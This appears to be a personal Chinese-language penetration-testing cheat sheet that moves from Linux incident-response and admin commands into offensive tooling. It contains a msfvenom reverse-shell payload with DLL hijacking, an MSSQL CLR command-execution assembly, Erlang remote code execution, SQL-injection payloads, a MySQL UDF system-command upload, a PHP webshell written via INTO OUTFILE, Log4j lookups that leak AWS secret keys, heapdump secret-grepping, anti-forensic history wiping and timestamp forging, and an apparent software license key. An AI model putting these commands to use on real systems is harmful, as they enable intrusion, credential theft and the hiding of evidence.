dpkg-query -W -f='${Package}-${Version}-${Architecture}\n' libpam-modules-bin //通过使用dpkg-query的-W和-f或--showformat选项,可以分别输出这些字段和其他字段libpam-modules-bin-1.3.1-5-amd64
grep -nv 'root' /etc/passwd //过滤出不带有某个关键词的行并输出行号
lsof -u root //查看某个用户启动了什么进程
lsof -i:8080 //某个端口是哪个进程打开的
netstat -anp //a参数是列出所有连接,n是不要解析机器名,p列出进程名
ps -ef | grep tomcat //查看tomcat进程
netstat -anop | grep 5517 //根据进程号查看tomcat端口号
netstat -antp
ps auxef
while true; do netstat -antp | grep [ip]; done
ll /proc/[pid]/exe //查找进程文件
strace -tt -T -e trace=all -p [pid] //跟踪异常进程运行情况
lsof -p [pid] //查看进程打开的文件
grep "Accepted " /var/log/secure* | awk '{print $1,$2,$3,$9,$11}' //查看登录成功的日期、用户名及ip
find /etc/ /usr/bin/ /usr/sbin/ /bin/ /usr/local/bin/ /var/spool/cron/ -type f -mtime -1 | xargs ls -l
awk -F ":" '$3==0{print $1}' /etc/passwd //查找特权用户
awk '/\$1|\$6/{print $1}' /etc/shadow //查找已设置密码散列($1 为 MD5,$6 为 SHA-512)的账号,即可以用密码登录的账号信息
cat /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)" //查找sudo权限账户
grep "Failed password" /var/log/secure | awk {'print $9'} | sort | uniq -c | sort -nr //查看爆破用户名字典
cat /etc/rc.local
service --status-all
chkconfig --list //确认是否有异常开机启动项
grep -rn "[ip]" * / //查找关键字
ps -ef | grep sshd //跟踪SSHD进程
strace -o sshd.strace -f -p [pid] //跟踪异常进程运行情况,并输出到sshd.strace
cat sshd.strace //查看异常进程情况
strings -td /lib/x86_64-linux-gnu/security/pam_unix.so //pam_unix.so文件字符串检查
ifconfig //查看所有网络接口的属性
iptables -L //查看防火墙设置
route -n //查看路由表
netstat -lntp //查看所有监听端口
netstat -antp //查看所有已经建立的连接
netstat -s //查看网络统计信息
find . -name '*.php' -mmin -60 //查找当前目录中60分钟内被修改过的.php文件
find . -name '*.php' -mtime 0 //查找当前目录中24小时内修改过的PHP文件,这个比较常用于网页文件的检查,是否有被修改的痕迹。
find . -name "[A-Z]*" -print //查找当前目录中以有大写字母开头的文件
find /www -name "vps*" -print //查找www目录中以vps开头的文件
find . -perm 777 -print //查到当前目录中具有777权限的文件
find . -size +1000000c -print //查找当前目录中文件字节数大于1MB的文件
find -type f -mtime -3 //最近3天修改过的文件
find -type f -ctime -3 //最近3天状态(ctime)变更过的文件;注意 ctime 是 inode 变更时间而非创建时间,可与 -mtime 的结果对比
unconfined_u:object_r:admin_home_t:s0 - 错误的安全上下文
system_u:object_r:httpd_config_t:s0 - 正确的安全上下文
ls -lZ xxx //查看安全上下文
chcon --reference=ssl.conf httpd.conf //使用ssl.conf安全上下文用于httpd.conf
yum -y install lrzsz //安装
rz filename //上传
sz filename //下载
ssh-keygen //在本地服务器上生成密钥对
ssh-copy-id -i ~/.ssh/id_rsa.pub UserName@RemoteServer //在远程服务器上安装公钥,SSH公钥保存在远程Linux服务器的.ssh/authorized_keys文件中
ssh [email protected] -i ~/.ssh/id_rsa //id_rsa免密登陆,修改id_rsa权限chmod 600 id_rsa
whereis //命令搜索程序名
which //命令是查找命令是否存在,以及命令的存放位置在哪儿
nohup /usr/local/node/bin/node /www/im/chat.js >> /usr/local/node/output.log 2>&1 & //不挂断地运行命令,在后台运行
chattr +i /etc/fstab //开启文件或目录的该项属性
chattr -i /etc/fstab //关闭文件或目录的该项属性
lsattr passwd //查看文件属性
s---ia-------e-- passwd
chattr -isa /etc/passwd //关闭文件sai属性
who /var/log/wtmp
stat tgs.txt //命令查看当前文件的时间戳
touch -d "2012-10-19 12:12:12.000000000 +0530" tgs.txt //使用字符串来更改时间
touch -r tgs.txt a.txt //使用tgs.txt文件的访问和修改时间戳更新文件a.txt的时间戳
<space>命令 //在命令前放置一个空格,它不会保存在Bash历史记录中
history -cw //清除所有Bash历史记录
history -dw 352 //从Bash历史记录文件中删除某一行(例如352)
history -r //仅清除当前会话的Bash历史记录
export HISTSIZE=0 //禁用当前会话的所有历史记录
export HISTFILE=/dev/null //丢弃当前会话的所有历史记录
export HISTSIZE=0;export HISTFILE=/dev/null;set +o history
[space]set +o history //单次会话中禁用某一段命令记录
[Space]set -o history //单次会话中启用某一段命令记录
proxychains nmap -sT -PN -n -sV -p 80,443,21,22 217.xx.xx.xx
tar -zcvf test.tar.gz /home/test/ --ignore-failed-read //直接打包tar.gz
tar -xvf test.tar.gz //解压缩tar.gz
tar --exclude /home/public_html/img -zcvf test.tar.gz /home/public_html/ //排除目录img
tar -tvf test.tar.gz | more //列出tar.gz压缩包内容
tar czvf test.tar.gz --exclude=\*.{jpg,gif,png,wmv,flv,tar.gz,zip} /home/me //排除多个特定文件类型
tar -zcvf /tmp/test.tar.gz -X exclude.txt /home/me //排除多目录或特定文件类型
cat exclude.txt //附加文件名
abc
xyz
*.bak
yum install -y unzip gcc make libpcap-devel
wget https://github.com/robertdavidgraham/masscan/archive/master.zip
unzip master.zip && cd masscan*
make && make install && cd ../ && rm -rf master.zip masscan*
或
sudo apt-get install -y unzip gcc make libpcap-dev
wget https://github.com/robertdavidgraham/masscan/archive/master.zip
unzip master.zip && cd masscan*
sudo make && sudo make install && cd ../ && rm -rf master.zip masscan*
masscan -p6379 --max-rate 400000 192.168.0.1/24 |awk '{print $6}'
wget http://www.unixwiz.net/tools/nbtscan-source-1.0.35.tgz -O /tmp/nbtscan.tgz && mkdir /tmp/nbtscan && rm -rf nbtscan.tgz && tar -xvzf nbtscan.tgz -C /tmp/nbtscan && cd /tmp/nbtscan && make && ./nbtscan
wget https://ftp.tu-chemnitz.de/pub/linux/dag/redhat/el7/en/x86_64/rpmforge/RPMS/nbtscan-1.5.1-1.2.el7.rf.x86_64.rpm && rpm -ivh nbtscan-1.5.1-1.2.el7.rf.x86_64.rpm && rm -rf nbtscan-1.5.1-1.2.el7.rf.x86_64.rpm
- EmEditor
- https://download.emeditor.info/emed64_22.2.0.msi 无提示版
- DMAZM-WHY52-AX222-ZQJXN-79JXH
- Sublime Text
- Notepad++
- Typora
- Proxifier
- 模拟器代理规则[雷电、夜神]
ldboxheadless.exe; noxvmhandle.exe
- 模拟器代理规则[雷电、夜神]
- JustTrustMe
- Android-SSL-TrustKiller
- burpsuite+brida
- Sandroid-ssl-pinning-demo(证书固定演示)
- apk-mitm(自动修改apk)
- https://www.freebuf.com/articles/system/347725.html
- https://medium.com/globant/testing-ssl-pinning-in-a-mobile-application-2dcac9ab3d0c
- https://www.hackingarticles.in/android-hooking-and-sslpinning-using-objection-framework/
- https://github.com/httptoolkit/android-ssl-pinning-demo
- https://vavkamil.cz/2019/09/15/how-to-bypass-android-certificate-pinning-and-intercept-ssl-traffic/
- https://arben.sh/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/
- https://codeshare.frida.re/@sowdust/universal-android-ssl-pinning-bypass-2/
- https://justinpineda.com/2020/11/27/bypassing-ssl-pinning-and-traffic-redirection-to-burp-suite-using-mobsf-and-genymotion/
- https://www.freebuf.com/sectool/280622.html
- https://github.com/shroudedcode/apk-mitm
- https://cobalt.io/vulnerability-wiki
- https://github.com/swisskyrepo/PayloadsAllTheThings
- https://attackdefense.com/
- https://vk9-sec.com/
- https://techvomit.net/pentesting-notes-and-snippets/
- https://book.hacktricks.xyz/welcome/readme
- https://haxez.org/
- https://evolyutsiya.github.io/2019/09/22/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/
- https://evolyutsiya.github.io/2019/09/22/upload-labs%E8%BF%87%E5%85%B3%E8%AE%B0%E5%BD%95/
- https://cybr.com/ethical-hacking-archives/sqlmap-cheat-sheets-to-help-you-find-sql-injections/
- https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap
- https://www.anquanke.com/post/id/188173
- https://www.hacking8.com/sqlmap-parse/11.html
- http://www.beesfun.com/2017/03/31/sqlmap%E4%BD%BF%E7%94%A8%E4%B9%8B%E8%87%AA%E5%AE%9A%E4%B9%89payload/
- https://zhuanlan.zhihu.com/p/390240866
- https://cloud.tencent.com/developer/article/1076399
- https://lucadidomenico.medium.com/how-to-write-custom-tamper-scripts-for-sqlmap-93927808809e
- https://blog.csdn.net/weixin_40418457/article/details/118789177
- https://www.stationx.net/sqlmap-cheat-sheet/
- http://www.rohitab.com/discuss/forum/9-source-codes/
- https://search.unprotect.it/
- https://www.phrozen.io/
- https://indetectables.net/viewforum.php?f=102
- https://payload.cafe/2022/10/02/havoc-c2-intro-inline-csharp-compilation-within-powershell/
-
- Another Redis DeskTop Manage
- https://github.com/MicrosoftArchive/redis/releases
- https://infosecwriteups.com/exploiting-redis-through-ssrf-attack-be625682461b
dll劫持
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.56.131 LPORT=1337 -f c msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.56.131 LPORT=1337 -f raw -o payload_x64.bin SharpDllProxy.exe --dll C:\Windows\System32\version.dll --payload payload_x64.bin- https://s1gh.sh/discord-dll-hijacking-persistence/
- https://0x191unauthorized.blogspot.com/2011/08/reverse-shell-through-dll-injection.html
- https://download.sysinternals.com/files/ProcessExplorer.zip
- https://download.sysinternals.com/files/ProcessMonitor.zip
- https://download.sysinternals.com/files/Autoruns.zip
- https://www.nirsoft.net/utils/dll_export_viewer.html
- https://jkme.github.io/2020/09/10/redis-windows-hijack.html
;开启mssql CLR功能
sp_configure 'clr enabled', 1
GO
RECONFIGURE
GO
;数据库标记为安全的程序集
ALTER DATABASE master SET TRUSTWORTHY ON;
;导入程序集
CREATE ASSEMBLY [evilclr]
AUTHORIZATION [dbo]
FROM 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
WITH PERMISSION_SET = UNSAFE;
go
;创建存储过程
CREATE PROCEDURE [dbo].[ExecCommand]
@cmd NVARCHAR (MAX)
AS EXTERNAL NAME [evilclr].[StoredProcedures].[ExecCommand]
go
;执行命令
exec dbo.execcommand 'whoami'
demo
- test是连接到群集时要调用攻击框的节点名称
- rabbit是要连接到的群集名称
- WIN-PM0ID6F0AHN是我通过其连接到群集的主机名
erl -sname test //连接到test节点
net_kernel:connect('rabbit@WIN-PM0ID6F0AHN'). //连接到群集(命令末尾的重要终止符的句点)
erlang:spawn('rabbit@WIN-PM0ID6F0AHN',os,cmd,["calc.exe"]). //代码执行(当然是起始计算)
os:cmd("whoami"). //代码执行
init:stop(). //退出Erlang Shell是使用init:stop函数完成的
- https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd
- https://securityboulevard.com/2018/09/erlang-authenticated-remote-code-execution/
- https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution
- https://deepsurface.com/deepsurface-security-advisory-local-privilege-escalation-in-erlang-on-windows-cve-2021-29221/
- https://redcanary.com/blog/netwire-remote-access-trojan-on-linux/
- BishopFox/sliver#9
- http://www.rohitab.com/discuss/forum/9-source-codes/
- https://krabsonsecurity.com/
- https://asec.ahnlab.com/jp/26987/
- https://github.com/BishopFox/sliver/wiki/Stagers
- https://lowery.tech/building-a-custom-shellcode-stager-with-process-injection-to-bypass-windows-defender/
- https://mrd0x.com/download-and-execute-sliver-stager/
- https://www.mad-coding.cn/2020/02/08/sqlmap%E5%91%BD%E4%BB%A4%E9%9B%86%E5%90%88/#0x11-%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E8%A1%A8%E5%90%8D
- https://www.hacking8.com/sqlmap-parse/11.html
- https://zhuanlan.zhihu.com/p/390240866
- https://developer.aliyun.com/article/791804
- https://blog.csdn.net/keaidxxn/article/details/120701689
鎈'"\(
'and(select*from(select+sleep(3))a/**/union/**/select+1)='
(select*from(select+sleep(2)union/**/select+1)a)
sqlmap中自带的shell以及一些二进制文件不能直接使用的,为防止被误杀都经过异或方式编码的(所幸sqlmap自带解码工具)
sqlmap/extra/cloak //sqlmap安装目录/extra/cloak下
Usage: ./cloak.py [-d] -i <input file> [-o <output file>]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-d Decrypt
-i INPUTFILE Input file
-o OUTPUTFILE Output file
sqlmap --headers="Host:www.baidu.com\nUser-Agent:baidu.com"
sqlmap --force-ssl --delay 10
sqlmap -u "https://x.x.x.x/index.php?id=1" --tamper unmagicquotes --dbs
pip install PyMySQL //-d 参数所需依赖
sqlmap -d "mysql://admin:[email protected]:3306/testdb" --sql-shell //连接数据库执行sql语句,查询数据库插件路径
show variables like "%plugin%"; 或 select @@plugin_dir;
sqlmap -d "mysql://admin:[email protected]:3306/testdb" --file-write=/lib_mysqludf_sys.so --file-dest=/usr/lib/mysql/plugin/ //上传lib_mysqludf_sys.so到MySQL插件目录
sqlmap -d "mysql://admin:[email protected]:3306/testdb" --sql-shell //激活存储过程「sys_exec」函数,执行系统命令
CREATE FUNCTION sys_exec RETURNS STRING SONAME lib_mysqludf_sys.so
SELECT * FROM information_schema.routines
sys_exec(id);
SELECT @@VERSION; //查看mysql版本
SELECT @@hostname; //查看数据库主机名
SELECT user,password,host FROM mysql.user; //查看数据库用户密码和连接地址
SELECT schema_name FROM information_schema.schemata; //查看数据库
SELECT * from mysql.user where user = substring_index(user(), '@', 1) ; //查询当前数据库用户权限
SELECT id,name,password,secret_key from admin_db.user_xxxx where is_delete = 0; //指定条件查询数据
SELECT table_schema,COUNT(table_name) FROM information_schema.TABLES GROUP BY table_schema //统计所有库下的表个数
SELECT table_schema,GROUP_CONCAT(table_name) FROM information_schema.tables GROUP BY table_schema; //查询整个数据库中所有库和所对应的表信息
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA 获取所有数据库名
SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME = DATABASE() 获取当前数据库
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqlinjection' 获取指定数据库表名
SELECT TABLE_NAME,TABLE_ROWS FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='sqlinjection' 获取指定数据库表名和表统计
SELECT TABLE_NAME,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='sqlinjection' 获取指定数据库表名和字段名
SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'sqlinjection' 获取指定数据库表名计数
SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='sqlinjection' and TABLE_NAME='members' 指定数据库表名获取字段
SELECT username,password FROM sqlinjection.members 获取指定数据库、表、字段信息
SELECT username,password FROM sqlinjection.members LIMIT 0,1 获取指定数据库、表、字段信息,限制查询条数
sqlmap -u "https://x.x.x.x/index.php?id=1" --sql-query "select id,name,password,secret_key from admin_db.user_xxxx where is_delete = 0" -o //指定条件查询数据select 字段 from 数据库名.表名 where 判断 = 条件
sqlmap -u "https://x.x.x.x/index.php?id=1" --sql-query "UPDATE admin_db.user_xxxx SET is_delete=0 WHERE id=3" -o //UPDATE 数据库名.表名 SET 字段名=值 WHERE 判断=条件
sqlmap -u "https://x.x.x.x/index.php?id=1" --sql-query "INSERT INTO admin_db.admin_xxxx_ip (ip,memo,time,operator) VALUES('127.0.0.1', '365',1554515620,943)" //插入新数据
SELECT name FROM master..sysdatabases //查询数据库
SELECT name FROM master..sysobjects WHERE xtype='U' //查询表名
SELECT Name FROM SysColumns Where id=Object_Id('TableName') //获取字段名
SELECT name FROM master..syscolumns WHERE id = (SELECT id FROM master..sysobjects WHERE name = 'tablename') //查字段名
SELECT TOP 1 * FROM 数据库..表名 //查看数据库中表的一条记录
WebSocket定义了两种URI格式,"ws://" 和 "wss://",类似于HTTP和HTTPS:"ws://" 使用明文传输,默认端口为80;"wss://" 使用TLS加密传输,默认端口为443
python ws-harness.py -h //帮助
python ws-harness.py -u ws://dvws.local:8080/authenticate-user-prepared -m a.txt //-u 远程websocket地址 -m 包含WebSocket消息模板的文件,把[FUZZ]放在需要注入的注入点
python sqlmap.py -u "http://localhost:8000/?fuzz=test" --dbs --tamper base64encode.py //DVWS模拟websocket注入
知道网站路径后需要将上传脚本转换为十六进制
<form enctype="multipart/form-data" action="upload.php" method="POST"><input name="uploadedfile" type="file"/><input type="submit" value="Upload File"/></form> <?php $target_path=basename($_FILES['uploadedfile']['name']);if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$target_path)){echo basename($_FILES['uploadedfile']['name'])." has been uploaded";}else{echo "Error!";}?>
现在让我们用sqlmap启动--sql-shell并注入
SELECT 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 INTO OUTFILE "/home/relax/public_html/upload.php";
几秒钟后,如果成功,您应该得到确认http://x.x.x.x/upload.php
${docker:containerId}
${docker:containerName}
${docker:imageId}
${docker:imageName}
${docker:shortContainerId}
${docker:shortImageId}
${env:USER}
${env:user}
${env:COMPUTERNAME}
${env:USERDOMAIN}
${env:AWS_SECRET_ACCESS_KEY}
${hostName}
${env:JAVA_VERSION}
${java:version}
${java:runtime}
${java:vm}
${java:os}
${java:locale}
${java:hw}
${k8s:accountName}
${k8s:clusterName}
${k8s:containerId}
${k8s:containerName}
${k8s:host}
${k8s:hostIp}
${k8s:labels.app}
${k8s:labels.podTemplateHash}
${k8s:masterUrl}
${k8s:namespaceId}
${k8s:namespaceName}
${k8s:podId}
${k8s:podIp}
${k8s:podName}
${k8s:imageId}
${k8s:imageName}
${main:0}
${main:1}
${main:2}
${main:3}
${main:4}
${main:bar}
${web:attr.name}
${web:contextPath}
${web:contextPathName}
${web:effectiveMajorVersion}
${web:effectiveMinorVersion}
${web:initParam.name}
${web:majorVersion}
${web:minorVersion}
${web:rootDir}
${web:serverInfo}
${web:servletContextName}
${sys:logPath}
${sys:java.version}
${sys:java.vendor}
${date:MM-dd-yyyy}
${ctx:loginId}
${bundle:application:spring.activemq.password}
${bundle:application-druid:spring.datasource.password}
${bundle:application:spring.datasource.password}
https://docs.spring.io/spring-boot/docs/current/reference/html/application-properties.html
application.properties site:github.com redis
application.yaml
application-druid.yml
mgr.site.url
mgr.site.url
mch.site.url
isv.site.url
mbr.site.url
redis.pass
redis.pass
redis.ip
master.datasource.username
master.datasource.password
master.datasource.url
slave.datasource.url
slave.datasource.username
slave.datasource.password
db.mysqlUrl
db.password
db.username
- https://github.com/microsoft/playwright-python
- https://github.com/sml2h3/ddddocr
- https://r0yanx.com/2022/05/10/%E5%9F%BA%E4%BA%8E%E6%B5%8F%E8%A7%88%E5%99%A8%E7%9A%84%E5%8F%A3%E4%BB%A4%E6%9A%B4%E7%A0%B4/
- http://ngc660.cn/2022/11/%E5%88%A9%E7%94%A8selenium%E7%BB%95%E8%BF%87%E5%89%8D%E7%AB%AFjs%E5%8A%A0%E5%AF%86%E5%8F%8A%E9%AA%8C%E8%AF%81%E7%A0%81%E7%88%86%E7%A0%B4/
- https://blog.csdn.net/weixin_44688529/article/details/129581697
- https://www.11bsn.com/details/burpsuite-java-captchakiller-python-dddoc-identify-orcode/
- https://mdnice.com/writing/5a6d8640e0f348c68cd479a093a068f8
- https://www.jianshu.com/p/b85f7d4f8c49
- https://www.stationx.net/how-to-use-burp-suite/
- https://github.com/NickLaughlin1/BurpSuiteGuide
- https://github.com/iamyuthan/BurpSuitePro-Guide
- https://s0cm0nkey.gitbook.io/s0cm0nkeys-security-reference-guide/red-offensive/scanning-active-recon/burp-suite
- https://parsiya.net/blog/2019-10-13-quality-of-life-tips-and-tricks-burp-suite/
- https://infosecwriteups.com/6-burp-suite-tips-tricks-60592cf843ba
- https://www.trustedsec.com/blog/intro-to-web-app-security-testing-burp-suite-tips-tricks/
- https://blog.z-labs.eu/2022/01/12/burp-suite-pro-authn-for-cli-tools.html
- https://www.pethuraj.com/blog/use-burpsuite-like-a-pro-part-1/
- https://github.com/DingyShark/BurpSuiteCertifiedPractitioner
- https://security.stackexchange.com/questions/247826/how-to-load-files-in-tls-pass-through-in-burp-suite
如果您想要创建一个正则表达式来匹配 google.com、google.com.hk 以及其所有子域名(如 www.google.com、log.google.com、log2.google.com.hk 等),可以使用以下的正则表达式:
^(.*\.)?google\.(com|com\.hk)$
解释:
^:表示字符串的开始。(.*\.)?:可选的部分,匹配任意子域名(包括没有子域名的情况)。.*表示匹配任意字符(包括零个或多个字符),后面的\.匹配一个点,问号?表示这个部分可以出现零次或一次。google\.:匹配主域名google.。(com|com\.hk):匹配.com或.com.hk。$:表示字符串的结束。
{
"proxy":{
"ssl_pass_through":{
"apply_to_out_of_scope_items":true,
"automatically_add_entries_on_client_ssl_negotiation_failure":false,
"rules":[
{
"enabled":true,
"host":"^.*\\.adspower\\.(com|net)$",
"protocol":"any"
},
{
"enabled":true,
"host":"^.*\\.cloudflare\\.com$",
"protocol":"any"
},
{
"enabled":true,
"host":"^.*\\.doubleclick\\.net$",
"protocol":"any"
},
{
"enabled":true,
"host":"^.*\\.google-analytics\\.com$",
"protocol":"any"
},
{
"enabled":true,
"host":"^(.*\\.)?google\\.(com|cn|com\\.hk)$",
"protocol":"any"
},
{
"enabled":true,
"host":"^.*\\.googleadservices\\.com$",
"protocol":"any"
},
{
"enabled":true,
"host":"^.*\\.googleapis\\.com$",
"protocol":"any"
},
{
"enabled":true,
"host":"^.*\\.googletagmanager\\.com$",
"protocol":"any"
},
{
"enabled":true,
"host":"^(.*\\.)?gstatic\\.com$",
"protocol":"any"
},
{
"enabled":true,
"host":"^.*\\.jsdelivr\\.net$",
"protocol":"any"
},
{
"enabled":true,
"host":"^(.*\\.)?youtube\\.com$",
"protocol":"any"
},
{
"enabled":true,
"host":"^.*\\.ytimg\\.com$",
"protocol":"any"
},
{
"enabled":true,
"host":"^cdn\\.jsdelivr\\.net$",
"protocol":"any"
},
{
"enabled":true,
"host":"^cdnjs\\.cloudflare\\.com$",
"protocol":"any"
},
{
"enabled":true,
"host":"^unpkg\\.com$",
"protocol":"any"
},
{
"enabled":true,
"host":"^code\\.jquery\\.com$",
"protocol":"any"
}
]
}
}
}
- https://blog.51cto.com/libai/5375917
- https://y4er.com/posts/fastjson-1.2.80/
- https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet
- https://github.com/depycode/fastjson-local-echo
- https://blog.harold.kim/2018/11/bctf2018-babyweb-writeup/
- https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
- https://stack.chaitin.com/tool/detail/1166
- https://stack.chaitin.com/tool/detail/1036
- https://stack.chaitin.com/tool/detail/31
strings heapdump | grep -B 2 -A 2 "eyJ"
strings heapdump | grep -B 2 -A 2 "AKIA"
strings heapdump | grep -E "^Host:\s+\S+$" -C 10
strings heapdump | grep -E "AKIA|eyJ"
strings heapdump | grep -i "Cookie:"
strings heapdump | grep -iE "password|token|secret|key|cred|hash|authorization|pwd|passwd|db_url|ldap|jdbc|connection"
docker pull git.xxx.com/cpg/frontend:latest //拉取镜像
docker images //查看本地所有镜像
docker inspect <镜像名称或ID> //查看镜像的详细信息,根据diff目录查看配置文件
docker image prune -a //删除所有未被使用的镜像
docker rmi $(docker images -q) //删除所有本地镜像(如需强制删除可加 -f)


